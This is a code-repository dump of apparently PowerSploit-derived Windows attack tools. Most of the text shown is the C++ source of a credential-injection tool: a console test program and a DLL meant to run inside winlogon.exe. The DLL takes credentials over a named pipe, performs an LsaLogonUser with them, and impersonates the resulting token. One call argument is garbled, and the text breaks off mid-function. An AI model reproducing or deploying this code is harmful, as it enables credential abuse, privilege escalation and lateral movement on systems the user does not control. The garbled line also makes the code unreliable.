├── .gitignore
├── Get-ComputerDetails
├── Get-ComputerDetails.ps1
└── README.md
├── Invoke-CredentialInjection
├── Invoke-CredentialInjection.ps1
├── LogonUser
│ └── LogonUser
│ │ ├── LogonUser.sln
│ │ ├── LogonUser
│ │ ├── LogonUser.cpp
│ │ ├── LogonUser.vcxproj
│ │ ├── LogonUser.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ │ └── logon
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── logon.cpp
│ │ ├── logon.vcxproj
│ │ ├── logon.vcxproj.filters
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
└── README.md
├── Invoke-Mimikatz
├── Invoke-Mimikatz.ps1
└── README.md
├── Invoke-NinjaCopy
├── Invoke-NinjaCopy.ps1
├── NTFSParser
│ ├── NTFSParser.sln
│ ├── NTFSParser
│ │ ├── NTFS.h
│ │ ├── NTFSParser.cpp
│ │ ├── NTFSParser.vcxproj
│ │ ├── NTFSParser.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ └── NTFSParserDLL
│ │ ├── NTFS.h
│ │ ├── NTFSParserDLL.cpp
│ │ ├── NTFSParserDLL.vcxproj
│ │ ├── NTFSParserDLL.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
└── README.md
├── Invoke-ReflectivePEInjection
├── Convert-FileToBase64String.ps1
├── Convert-FileToByteArrayString.ps1
├── DemoDLL
│ ├── DemoDLL.sln
│ └── DemoDLL
│ │ ├── DemoDLL.cpp
│ │ ├── DemoDLL.h
│ │ ├── DemoDLL.vcxproj
│ │ ├── DemoDLL.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── DemoDLL_RemoteProcess
│ ├── DemoDLL_RemoteProcess.sln
│ └── DemoDLL_RemoteProcess
│ │ ├── DemoDLL_RemoteProcess.cpp
│ │ ├── DemoDLL_RemoteProcess.vcxproj
│ │ ├── DemoDLL_RemoteProcess.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── DemoExe
│ ├── DemoExe.sln
│ ├── DemoExe_MD
│ │ ├── DemoExe_MD.cpp
│ │ ├── DemoExe_MD.vcxproj
│ │ ├── DemoExe_MD.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ └── DemoExe_MDd
│ │ ├── DemoExe_MDd.cpp
│ │ ├── DemoExe_MDd.vcxproj
│ │ ├── DemoExe_MDd.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── ExeToInjectInTo
│ ├── ExeToInjectInTo.sln
│ └── ExeToInjectInTo
│ │ ├── ExeToInjectInTo.cpp
│ │ ├── ExeToInjectInTo.vcxproj
│ │ ├── ExeToInjectInTo.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── Invoke-ReflectivePEInjection.ps1
├── README.md
└── Shellcode
│ ├── readme.txt
│ ├── x64
│ ├── CallDllMain.asm
│ ├── ExitThread.asm
│ ├── GetFuncAddress.asm
│ └── LoadLibraryA.asm
│ └── x86
│ ├── CallDllMain.asm
│ ├── ExitThread.asm
│ └── GetProcAddress.asm
├── Invoke-TokenManipulation
├── Invoke-TokenManipulation.ps1
└── README.md
└── README.md
/.gitignore:
--------------------------------------------------------------------------------
1 | #################
2 | ## Eclipse
3 | #################
4 |
5 | *.pydevproject
6 | .project
7 | .metadata
8 | bin/
9 | tmp/
10 | *.tmp
11 | *.bak
12 | *.swp
13 | *~.nib
14 | local.properties
15 | .classpath
16 | .settings/
17 | .loadpath
18 |
19 | # External tool builders
20 | .externalToolBuilders/
21 |
22 | # Locally stored "Eclipse launch configurations"
23 | *.launch
24 |
25 | # CDT-specific
26 | .cproject
27 |
28 | # PDT-specific
29 | .buildpath
30 |
31 |
32 | #################
33 | ## Visual Studio
34 | #################
35 |
36 | ## Ignore Visual Studio temporary files, build results, and
37 | ## files generated by popular Visual Studio add-ons.
38 |
39 | # User-specific files
40 | *.suo
41 | *.user
42 | *.sln.docstates
43 |
44 | # Build results
45 | [Dd]ebug/
46 | [Rr]elease/
47 | *_i.c
48 | *_p.c
49 | *.ilk
50 | *.meta
51 | *.obj
52 | *.pch
53 | *.pdb
54 | *.pgc
55 | *.pgd
56 | *.rsp
57 | *.sbr
58 | *.tlb
59 | *.tli
60 | *.tlh
61 | *.tmp
62 | *.vspscc
63 | .builds
64 | *.dotCover
65 |
66 | ## TODO: If you have NuGet Package Restore enabled, uncomment this
67 | #packages/
68 |
69 | # Visual C++ cache files
70 | ipch/
71 | *.aps
72 | *.ncb
73 | *.opensdf
74 | *.sdf
75 |
76 | # Visual Studio profiler
77 | *.psess
78 | *.vsp
79 |
80 | # ReSharper is a .NET coding add-in
81 | _ReSharper*
82 |
83 | # Installshield output folder
84 | [Ee]xpress
85 |
86 | # DocProject is a documentation generator add-in
87 | DocProject/buildhelp/
88 | DocProject/Help/*.HxT
89 | DocProject/Help/*.HxC
90 | DocProject/Help/*.hhc
91 | DocProject/Help/*.hhk
92 | DocProject/Help/*.hhp
93 | DocProject/Help/Html2
94 | DocProject/Help/html
95 |
96 | # Click-Once directory
97 | publish
98 |
99 | # Others
100 | [Bb]in
101 | [Oo]bj
102 | sql
103 | TestResults
104 | *.Cache
105 | ClientBin
106 | stylecop.*
107 | ~$*
108 | *.dbmdl
109 | Generated_Code #added for RIA/Silverlight projects
110 |
111 | # Backup & report files from converting an old project file to a newer
112 | # Visual Studio version. Backup files are not needed, because we have git ;-)
113 | _UpgradeReport_Files/
114 | Backup*/
115 | UpgradeLog*.XML
116 |
117 |
118 |
119 | ############
120 | ## Windows
121 | ############
122 |
123 | # Windows image file caches
124 | Thumbs.db
125 |
126 | # Folder config file
127 | Desktop.ini
128 |
129 |
130 | #############
131 | ## Python
132 | #############
133 |
134 | *.py[co]
135 |
136 | # Packages
137 | *.egg
138 | *.egg-info
139 | dist
140 | build
141 | eggs
142 | parts
143 | bin
144 | var
145 | sdist
146 | develop-eggs
147 | .installed.cfg
148 |
149 | # Installer logs
150 | pip-log.txt
151 |
152 | # Unit test / coverage reports
153 | .coverage
154 | .tox
155 |
156 | #Translations
157 | *.mo
158 |
159 | #Mr Developer
160 | .mr.developer.cfg
161 |
162 | # Mac crap
163 | .DS_Store
164 |
165 |
166 | .exe
167 | .dll
168 |
169 |
170 | .svn/
171 |
--------------------------------------------------------------------------------
/Get-ComputerDetails/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/LogonUser.cpp:
--------------------------------------------------------------------------------
1 | // LogonUser.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
// Forward declarations for this translation unit.
// NOTE(review): wcsByteLen and InitUnicodeString are declared here but neither is
// defined nor referenced anywhere else in this file; they appear to be leftovers.
size_t wcsByteLen( const wchar_t* str );
void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
// Builds an MSV1_0_INTERACTIVE_LOGON blob for LsaLogonUser; *size receives its byte length.
PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size);
// Copies str to baseAddress+offset and points uniStr at the copy; returns bytes written.
size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset);
12 |
// Console entry point. Connects to LSA, looks up the MSV1_0 authentication
// package, builds an MSV1_0_INTERACTIVE_LOGON blob from the credentials that are
// hard-coded below, and calls LsaLogonUser with logon type RemoteInteractive.
// Progress and errors are printed to stdout.
//
// argc/argv are not used. Returns -1 on any failure and 1 on success; note that
// a non-zero exit code is conventionally read as failure, so returning 0 on
// success would be the expected idiom.
//
// NOTE(review): the credentials on the CreateNtlmLogonStructure line are
// committed test values; secrets should not live in source even for a demo.
// Nothing opened or allocated here is released: the LSA_STRING from new, the
// logon blob, procToken, the returned token, profileBuffer
// (LsaFreeReturnBuffer) and hLSA (LsaDeregisterLogonProcess) all persist until
// process exit.
int _tmain(int argc, _TCHAR* argv[])
{
//Get a handle to LSA
HANDLE hLSA = NULL;
NTSTATUS status = LsaConnectUntrusted(&hLSA); // 0 (STATUS_SUCCESS) is the only value treated as success
if (status != 0)
{
cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl;
return -1;
}
if (hLSA == NULL)
{
cout << "hLSA is NULL, this shouldn't ever happen" << endl;
return -1;
}

//Build LsaLogonUser parameters
// OriginName is an arbitrary caller-supplied tag for the logon request; the DLL
// variant of this code passes an empty string instead.
LSA_STRING originName = {};
char originNameStr[] = "qpqp";
originName.Buffer = originNameStr;
originName.Length = (USHORT)strlen(originNameStr);
originName.MaximumLength = originName.Length;

ULONG authPackage = 0;
PLSA_STRING authPackageName = new LSA_STRING(); // never deleted; a stack LSA_STRING would do
char authPackageBuf[] = MSV1_0_PACKAGE_NAME;
authPackageName->Buffer = authPackageBuf;
authPackageName->Length = (USHORT)strlen(authPackageBuf);
authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
if (status != 0)
{
int winError = LsaNtStatusToWinError(status);
cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError; // no endl, unlike the other messages
return -1;
}

// NOTE(review): hard-coded test credentials (see header comment).
DWORD authBufferSize = 0;
PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize);
cout << "authBufferSize: " << authBufferSize << endl;

//Get TokenSource
// The TOKEN_SOURCE of the current process token is reused as the SourceContext of
// the new logon session. Only GetTokenInformation(TokenSource) is performed on
// procToken, so TOKEN_QUERY would suffice instead of TOKEN_ALL_ACCESS.
HANDLE hProcess = GetCurrentProcess();//todo
HANDLE procToken = NULL;
BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
if (!success)
{
DWORD errorCode = GetLastError();
cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl;
return -1;
}

TOKEN_SOURCE tokenSource = {};
DWORD realSize = 0;
success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
if (!success)
{
cout << "Call to GetTokenInformation failed." << endl; // GetLastError is not reported here
return -1;
}


//Misc
// Out-parameters filled in by LsaLogonUser; loginId and quotaLimits are left
// uninitialised because LSA writes them.
PVOID profileBuffer = NULL;
ULONG profileBufferSize = 0;
LUID loginId;
HANDLE token = NULL;
QUOTA_LIMITS quotaLimits;
NTSTATUS subStatus = 0;

// The 7th argument (LocalGroups) is 0: no additional groups are added to the token.
// NOTE(review): `"aLimits` on the QUOTA_LIMITS argument line reads like an
// HTML-entity extraction artefact for the address-of expression on quotaLimits;
// verify against the original source before building.
status = LsaLogonUser(hLSA,
&originName,
RemoteInteractive,
authPackage,
authBuffer,
authBufferSize,
0,
&tokenSource,
&profileBuffer,
&profileBufferSize,
&loginId,
&token,
"aLimits,
&subStatus);

if (status != 0)
{
NTSTATUS winError = LsaNtStatusToWinError(status); // ULONG result stored in a signed NTSTATUS
cout << "Error calling LsaLogonUser. Error code: " << winError << endl; // subStatus is not reported
return -1;
}

cout << "Success!" << endl;

return 1; // NOTE(review): non-zero on success, see header comment
}
109 |
//size will be set to the size of the structure created
// Builds an MSV1_0_INTERACTIVE_LOGON followed by the three strings in a single
// heap block so the whole thing can be passed to LsaLogonUser as
// AuthenticationInformation. The strings are stored without NUL terminators
// (UNICODE_STRING is counted) at increasing offsets after the fixed header, and
// the header's UNICODE_STRING members point into the same block.
// Returns the block, allocated with new BYTE[]; nothing in this file frees it.
// The wstring parameters are taken by value, so each call copies the password.
PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size)
{
size_t wcharSize = sizeof(wchar_t);

// Header plus the raw character bytes of all three strings, no terminators.
size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize);
MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON); // first string starts right after the header

ntlmLogon->MessageType = MsV1_0InteractiveLogon;
// Each write appends its string and advances offset by the bytes written.
offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset);
offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset);
offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset);

*size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
return ntlmLogon;
}
127 |
// Copies str (without its NUL) to baseAddress+offset and fills uniStr so that
// Length and MaximumLength hold the byte count and Buffer points at the copy.
// Returns the number of bytes written. There is no bounds check: the caller must
// have sized the destination block. The (USHORT) casts truncate byte counts
// above 65535 (32767 wchar_t).
// NOTE(review): the local `buffer` is assigned but never used; the memcpy calls
// str.c_str() again.
size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset)
{
const wchar_t* buffer = str.c_str();
size_t size = str.length() * sizeof(wchar_t);
uniStr->Length = (USHORT)size;
uniStr->MaximumLength = (USHORT)size;
uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset);
memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size);
return size;
}
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}
23 | Win32Proj
24 | LogonUser
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 |
88 |
89 | Console
90 | true
91 | secur32.lib;%(AdditionalDependencies)
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 |
101 |
102 | Console
103 | true
104 | secur32.lib;%(AdditionalDependencies)
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 |
116 |
117 | Console
118 | true
119 | true
120 | true
121 |
122 |
123 |
124 |
125 | Level3
126 | Use
127 | MaxSpeed
128 | true
129 | true
130 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
131 |
132 |
133 | Console
134 | true
135 | true
136 | true
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 | Create
150 | Create
151 | Create
152 | Create
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : LogonUser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this LogonUser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your LogonUser application.
9 |
10 |
11 | LogonUser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | LogonUser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | LogonUser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : logon Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this logon DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your logon application.
9 |
10 |
11 | logon.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | logon.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | logon.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named logon.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
// DLL entry point. No work is done for any loader notification (process or
// thread attach/detach); the loader is always told the call succeeded.
//
// hModule and lpReserved are unused. ul_reason_for_call is one of
// DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH, DLL_PROCESS_DETACH.
// Returns TRUE unconditionally.
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
(void)hModule;
(void)lpReserved;
// Every notification reason is accepted without side effects.
if (ul_reason_for_call == DLL_PROCESS_ATTACH ||
ul_reason_for_call == DLL_THREAD_ATTACH ||
ul_reason_for_call == DLL_THREAD_DETACH ||
ul_reason_for_call == DLL_PROCESS_DETACH)
{
// Nothing to initialise or tear down for this module.
}
return TRUE;
}
19 |
20 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/logon.cpp:
--------------------------------------------------------------------------------
1 | // logon.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
// Forward declarations for this translation unit.
// NOTE(review): wcsByteLen and InitUnicodeString are declared but neither is
// defined nor referenced anywhere else in this file.
size_t wcsByteLen( const wchar_t* str );
void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
// Each Create*LogonStructure returns one heap block holding the logon header
// plus its three strings; *size receives the block length in bytes.
PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);
PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);
// Copies str to address and points uniStr at it; returns bytes written.
size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address);
// Writes errorMsg to the pipe handle; also used for the final success message.
void WriteErrorToPipe(string errorMsg, HANDLE pipe);

// Exported entry point; the definition below repeats this declaration.
extern "C" __declspec( dllexport ) void VoidFunc();
16 |
17 |
//The entire point of this code is to call LsaLogonUser from within winlogon.exe
// Exported entry point, run once the DLL has been loaded into the target process.
// It opens the client end of the named pipe \\.\pipe\sqsvc, reads domain,
// username, password, a one-byte logon type and a one-byte auth-package selector
// from it, performs an LsaLogonUser with them, impersonates the resulting token
// on the calling thread, and then sleeps forever so the thread and its token stay
// alive. After the pipe is open, every outcome is reported back through the same
// pipe via WriteErrorToPipe; the function has no return value.
//
// NOTE(review): the fixed pipe name is a static artefact of this tool. The three
// credential strings arrive in cleartext and sit in heap buffers that are never
// cleared or freed. The pipe handle, procToken, hLSA, the LSA_STRING from new and
// the logon blob are likewise never released on any path, including the
// early-return error paths below.
extern "C" __declspec( dllexport ) void VoidFunc()
{
//Open a pipe which will receive data from the PowerShell script.
HANDLE pipe = CreateFile(L"\\\\.\\pipe\\sqsvc", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (pipe == INVALID_HANDLE_VALUE)
{
return; // the pipe is the only output channel, so nothing can be reported
}

// Each string field is read as at most 256 wchar_t (512 bytes) into a 257-slot
// buffer and terminated at index bytesRead/2, so the terminator always fits.
// An odd bytesRead silently drops its trailing byte from the string.
const size_t strSize = 257;
size_t bytesToRead = strSize * sizeof(wchar_t) - sizeof(wchar_t);
wchar_t* domain = new wchar_t[strSize];
wchar_t* username = new wchar_t[strSize];
wchar_t* password = new wchar_t[strSize];
DWORD bytesRead = 0;

BOOL success = ReadFile(pipe, domain, bytesToRead, &bytesRead, NULL);
if (!success)
{
return; // pipe left open, nothing reported
}
domain[bytesRead/2] = '\0';
bytesRead = 0;

success = ReadFile(pipe, username, bytesToRead, &bytesRead, NULL);
if (!success)
{
return; // pipe left open, nothing reported
}
username[bytesRead/2] = '\0';
bytesRead = 0;

success = ReadFile(pipe, password, bytesToRead, &bytesRead, NULL);
if (!success)
{
return; // pipe left open, nothing reported
}
password[bytesRead/2] = '\0';
bytesRead = 0;

//Get the logon type from the pipe
// Initialised to 10 (RemoteInteractive in SECURITY_LOGON_TYPE). ReadFile
// overwrites only the low byte of the USHORT, so the value becomes whatever
// single byte the client sent, and stays 10 if the read returns zero bytes.
USHORT logonType = 10;
success = ReadFile(pipe, &logonType, 1, &bytesRead, NULL);
if (!success)
{
return;
}
bytesRead = 0;

//Get the authentication package to use. 1 = Msv1_0, 2 = Kerberos
// Same one-byte-into-USHORT read as above.
USHORT authPackageToUse = 0;
success = ReadFile(pipe, &authPackageToUse, 1, &bytesRead, NULL);
if (!success)
{
return;
}
bytesRead = 0;

/////////////
//Build the parameters to call LsaLogonUser with
/////////////

//Get a handle to LSA
HANDLE hLSA = NULL;
NTSTATUS status = LsaConnectUntrusted(&hLSA); // 0 (STATUS_SUCCESS) is the only value treated as success
if (status != 0)
{
string errorMsg = "Error calling LsaConnectUntrusted. Error code: " + to_string(status);
WriteErrorToPipe(errorMsg, pipe);
return;
}
if (hLSA == NULL)
{
string errorMsg = "hLSA (LSA handle) is NULL, this shouldn't ever happen.";
WriteErrorToPipe(errorMsg, pipe);
return;
}

//Build LsaLogonUser parameters
// Empty OriginName (the console test tool in this repository uses "qpqp").
LSA_STRING originName = {};
char originNameStr[] = "";
originName.Buffer = originNameStr;
originName.Length = (USHORT)0;
originName.MaximumLength = 0;

//Build the authentication package parameter based on the auth package the powershell script specified to use
//Also get the AuthenticationInformation
char* authPackageBuf = NULL;
DWORD authBufferSize = 0;
PVOID authBuffer = NULL;
if (authPackageToUse == 1)
{
authPackageBuf = MSV1_0_PACKAGE_NAME; // string-literal macro assigned to a non-const char*
authBuffer = CreateNtlmLogonStructure(domain, username, password, &authBufferSize);
}
else if (authPackageToUse == 2)
{
authPackageBuf = MICROSOFT_KERBEROS_NAME_A; // string-literal macro assigned to a non-const char*
authBuffer = CreateKerbLogonStructure(domain, username, password, &authBufferSize);
}
else
{
string errorMsg = "Received an invalid auth package from the named pipe";
